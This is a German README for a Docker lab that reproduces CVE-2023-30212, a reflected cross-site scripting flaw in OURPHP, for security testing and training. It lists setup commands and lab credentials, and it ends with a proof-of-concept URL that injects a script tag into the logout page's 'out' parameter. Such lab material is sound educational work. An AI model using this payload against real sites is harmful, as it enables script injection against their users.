
Docker-basierte Laborumgebung zur Reproduktion von CVE-2023-30212, einer XSS-Schwachstelle in OURPHP, mit Schritt-für-Schritt-Einrichtungsanweisungen für Sicherheitstests und Schulungen.
Voraussetzung
Download docker.io
sudo apt install -y docker.io
Laden Sie alle Dateien aus meinem Repository mit dem folgenden Befehl herunter.
git clone https://github.com/AAsh035/CVE-2023-30212.git
Um nun ein Docker-Image zu erstellen, führen Sie den folgenden Befehl aus:
sudo docker build -t vuln .
Als nächstes muss das Docker-Image in einen Container umgewandelt werden. Der Container muss auf Port 80 laufen. Der Befehl lautet:
sudo docker run -d -p 80:80 vuln
Um zu überprüfen, ob der Container läuft, verwenden Sie den Befehl:
sudo docker ps
Geben Sie 127.0.0.1 im Browser ein und eine OURPHP-Seite wird geladen.
Sie müssen das ourphp mit Folgendem konfigurieren:
Benutzername : root
Passwort : root
Datenbankname: vuln
Jetzt müssen Sie Benutzername und Passwort für die Administration konfigurieren. Legen Sie Folgendes fest:
Benutzername: root
Passwort: root
Kopieren Sie nun den folgenden Link und fügen Sie ihn in den Browser ein:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0